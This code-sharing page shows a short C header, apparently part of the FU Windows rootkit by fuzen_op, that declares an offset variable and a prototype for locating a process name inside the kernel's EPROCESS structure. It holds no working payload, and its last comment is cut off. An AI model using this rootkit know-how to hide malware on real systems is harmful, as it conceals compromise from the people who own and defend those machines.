processname.h
来自「windows rootkit,可以列举出内核驱动程序以及就可以把自己的.sys」· C头文件 代码 · 共 18 行
H
18 行
///////////////////////////////////////////////////////////////////////////////////////
// Filename ProcessName.h
//
// Author: fuzen_op
// Email: fuzen_op@yahoo.com or fuzen_op@rootkit.com
//
// Description: Globals and function prototypes used by ProcessName.c
//
// Date: 5/27/2003
// Version: 1.0
ULONG gul_ProcessNameOffset; // Global variable set in DriverEntry
#define PROCNAMELEN 16 // In the EPROCESS struct the image name
// is 16 characters long
ULONG GetLocationOfProcessName(PEPROCESS); // Get offset of process name in
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?